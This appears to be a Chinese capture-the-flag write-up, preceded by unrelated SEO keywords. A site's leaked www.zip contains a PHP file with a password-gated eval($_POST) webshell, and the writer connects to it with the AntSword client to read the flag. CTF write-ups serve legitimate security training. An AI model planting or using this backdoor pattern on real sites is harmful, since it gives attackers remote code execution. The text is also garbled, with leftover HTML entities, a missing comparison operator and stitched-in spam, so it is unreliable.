可视化导航网站源码,承包活应该上什么平台,做网站的风险分析,重庆铜梁网站建设公司小蓝同学给你发来了他自己开发的网站链接#xff0c;
他说他故意留下了一个压缩包文件#xff0c;里面有网站的源代码#xff0c;
他想考验一下你的网络安全技能。
#xff08;点击“下发赛题”后#xff0c;你将得到一个http链接。如果该链接自动跳转到https#xff0c;…小蓝同学给你发来了他自己开发的网站链接
他说他故意留下了一个压缩包文件里面有网站的源代码
他想考验一下你的网络安全技能。
点击“下发赛题”后你将得到一个http链接。如果该链接自动跳转到https请手动将其改为http再进行访问。通过扫描工具扫出该网址下有www.zip文件下载后查看其中的1337.php
?php
# leet
if(md5($_GET[pwd])217f81b8ff0a1ab138a8e1bdc031262e){eval($_POST[1337]);
}可知MD5后的密文要等于’217f81b8ff0a1ab138a8e1bdc031262e’ 输入密码通过蚁剑进入SHELL
连接成功 进入根目录找到flag 成功夺旗
